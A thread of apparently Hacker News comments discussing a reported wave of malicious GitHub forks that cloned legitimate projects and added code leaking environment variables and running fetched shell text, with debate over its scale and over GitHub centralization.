What a garbage clickbait thread. From scary words like "attack", "infected", etc. you would think projects are compromised. But nothing is compromised. From wayyyyy down in the thread:<p>> The attacker creates FAKE orgs/repos and pushes clones of LEGIT projects to github.<p>Yeah, anyone can push anything to their own GitHub accounts/orgs, including malware. We know that.<p>Save yourself some time. Flagged.
This code does more than leak environments. The go code pulls down arbitrary text and passes it to sh -c, example: <a href="https://github.com/zerops-io/zcli/commit/0396ee57bc0e5e0b12323aac7a240c4563488f9b#diff-c444f711e9191b53952edb65bfd8c644419fc7695c62611dc0fb304b4fb197d6R50" rel="nofollow">https://github.com/zerops-io/zcli/commit/0396ee57bc0e5e0b123...</a>
note that it's 35,613 code results, not 35k repos<p>and 13K of the search results come from this org<p><a href="https://github.com/redhat-operator-ecosystem" rel="nofollow">https://github.com/redhat-operator-ecosystem</a>
This is a consequence of centralization. The canonical project sites and repositories should not be on GitHub.<p>Fanatics who believe otherwise will still clone those projects so that they are on sacred ground, but the practice should be frowned upon and fought against.<p>Another detrimental effect of GitHub is that they have trained users to accept public "forks" (a misnomer) as the usual way to contribute even trivial patches.
This lowers the bar for accepting and trusting non-official repositories.<p>GitHub has devalued the brand of large projects and has introduced the age of industrialized software development by creating an addictive environment where software politicians thrive by manipulating their social networks and working on their personal brand.
This is that thing where people can put anyone in as the commit author, thus impersonating the original creator right?<p>Seems like the solution is "don't just copy random github urls into your code" ?
While browsing the nanobox repo linked in the twitter thread I started to get 404s, so it looks like GitHub is on it. Edit: other repos have vanished as well now.
How would code like this make it into so many repos? People accepting pull requests and not properly reviewing them? Or is there something even worse about this attack?
TL;DR: These are forks by unknown people containing malware. I see no indication in the linked thread of even a single successful compromise actually occurring, or malicious code making it into legitimate upstream projects.
how is this affecting people if the clone does not open PRs to the original one?<p>so this will send data to the hacker's network if we clone and build the wrong repo right?
Oh dear. This is a gigantic disaster.<p>If lots of software released today haven't been pinning their versions on release (especially Electron apps) or signing their commits if they are open-source, then this is a chaotic supply chain attack waiting to happen and is more worse than I thought.<p>But really it is yet, another reason to avoid GitHub entirely and just self-host using GitLab or Gitea.